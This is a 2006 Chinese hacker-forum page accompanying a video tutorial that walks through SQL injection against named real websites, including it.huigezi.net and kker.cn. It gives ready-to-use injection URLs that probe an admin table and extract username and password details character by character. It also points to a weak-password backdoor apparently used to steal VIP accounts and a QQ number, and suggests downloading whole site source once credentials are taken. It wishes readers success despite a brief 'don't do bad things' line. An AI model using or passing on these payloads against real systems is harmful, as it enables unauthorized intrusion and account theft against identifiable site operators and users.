| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 | 
服务导航 我要发布 主力频道 空间域名 精华收集 服务器出租 黑客培训 光盘刻录 特色服务 解决方案 我要投诉
您现在的位置: 华夏黑客同盟 >> 动画 >> 漏洞利用 >> 动画信息 用户登录 新用户注册


黑客动画 黑客视频
资讯文章 黑客下载

灰鸽子漏洞 我要发布动画
文件大小:0 K
动画性质:未知
动画作者:风雪
类型格式:屏幕录像专家
责任编辑:hehe2358
下载次数总计:
添加时间:2006-2-10
解压密码:www.77169.org 或 www.77169.com

大家好,我是风雪,今天给大家做一个动画,今天的动画主题是灰鸽子和砍客联盟和小风居,这些网站大家都不会陌生,但这些站却存在漏洞,下面是本人和组织核心注入结果,他们都存在了搜索漏洞,灰鸽子的后台我们已经拿了下来,但我们在这里不公开,注入结果都在下面,砍客和灰鸽子的后台都被管理员做了手脚,注入点和后台之类的管理员的密码用工具是探测不出来的,只能手动的,后台路径由于被管理员做了手脚,所以希望大家用后台字典生成器生成后台,然后再去扫描,希望大家成功,灰鸽子大家一直都说有后门,今天我就把告诉大家一个后门,这个后门一些高手或许知道了,一些菜鸟可能不知道,但这个后门已经过时,但我相信还是有人在利用这个后门,灰鸽子的后门是POP弱口令,聪明一点的人已经知道是怎么回事了,我朋友曾经就利用这个漏洞挖掘了很多的VIP,还盗了一个QQ12388这个QQ号码盗来的时候还没有密码保护,由于灰鸽子的用户名都是五位数的,所以大部分的人都用自己的QQ做用户名,希望大家成功,注入结果和注入点我已经发了出来,希望大家好好研究,在此声明,本人和本站核心晨曦并没有利用漏洞盗取VIP,也没有在灰鸽子上挂马,希望管理员及时修复漏洞.....在这里可以给大家提供一个思路,如果拿到了管理员帐号和密码,而实在拿不到后台,建议大家用prosched之类的程序下载他们的整站程序,这样就可以了,虽然本人没有测试他们的整站程序可不可以下载,但只要大家动动脑子应该是可以弄来的,第八军团的程序就能下下来,我站的核心已经拿到了4G多了,还有好多都没下完...
本人QQ:449471 动画就到这里,注入的总结果我已经打包了,希望大家能够多多研究,国内的网络安全太脆弱。记住不要做坏事。
========================================================================================
地址:http://www.kker.cn/down/index.asp 注入点
漏洞存在于下载站搜索页面,在搜索中输入以下东东
砍客联盟主页两天都不能打开了,可以主页在该版,
win' and 1=1 and '%'='
win' and 1=1 and '%'='
进行测试,即可注入,
如:
win' and (select count(*) from admin)>0 and '%'=' 返回OK

可以猜到好多表名,但我猜不到ADMIN表的字段名,估计是被PCZZ给改了。同样小凤居也有些漏洞。
没有什么技术含量,有兴趣的朋友们自己去玩。
注意,不要破坏

鸽子注入结果  注入点:http://it.huigezi.net/query.asp
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="770" height="85">
     
     
      http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="770" height="85">
   

http://it.huigezi.net/query.asp
name="action" value="title" checked>程序名称
Nclassid
classid value="1"
name="action" value="content"
name="keyword"

http://it.huigezi.net/query.asp
http://it.huigezi.net/query.asp?action=content&classid=1&keyword=%' and 1=1 and '%25'='
http://it.huigezi.net/query.asp?action=content&classid=1&keyword=%' and 1=2 and '%25'='
http://it.huigezi.net/query.asp?action=content&classid=1&keyword=%' and (select count(*) from admin)>0 and '%25'=' OK
http://it.huigezi.net/query.asp?action=content&classid=1&keyword=%'%20and%20(select%20count(username)%20from%20admin)>0%20and%20'%25'='
http://it.huigezi.net/query.asp?action=content&classid=1&keyword=%'%20and%20(select%20count(password)%20from%20admin)>0%20and%20'%25'='

http://it.huigezi.net/query.asp?action=content&classid=1&keyword=%'%20and%20(select%20top%201%20len(username)%20from%20admin)=5%20and%20'%25'='
http://it.huigezi.net/query.asp?action=content&classid=1&keyword=%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%25'='
http://it.huigezi.net/query.asp?action=content&classid=1&keyword=%' and (select top 1 left(username,1) from admin)="a" and '%25'='
http://it.huigezi.net/query.asp?action=content&classid=1&keyword=%'%20and%20(select%20top%201%20left(username,2)%20from%20admin)='ad'%20and%20'%25'='
http://it.huigezi.net/query.asp?action=content&classid=1&keyword=%'%20and%20(select%20top%201%20left(username,5)%20from%20admin)='admin'%20and%20'%25'='
http://it.huigezi.net/query.asp?action=content&classid=1&keyword=%' and (select top 1 len(password) from admin)=16 and '%25'='         

 

http://it.huigezi.net/query.asp?action=content&classid=1&keyword=%' and [这里是注入条件] and '%25'='
在注入条件里写上你的注入语句

本地下载网通下载电信下载铁通下载联通下载北京下载
华夏提醒
(只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
姓 名:
* 游客填写  ·注册用户
主 页:
评 分:
1分 2分 3分 4分 5分
评论内容:
验证码: *
  • 请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。
  • 严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论 。
  • 用户需对自己在使用本站服务过程中的行为承担法律责任(直接或间接导致的)。
  • 本站管理员有权保留或删除评论内容。
  • 评论内容只代表网友个人观点,与本网站立场无关。
  • 最新推荐资讯
    最新推荐视频
    最新推荐软件

    Copyright @ 2005 77169.Net Inc. All rights reserved. 华夏黑客同盟 版权所有
    北京市电信通提供网络带宽
    mailto:webmaster@77169.net
    咨询QQ号:836982 / 59280880
    联系站长 QQ38588913
    热线电话:86-10-67634029/676229433
    京ICP证041431号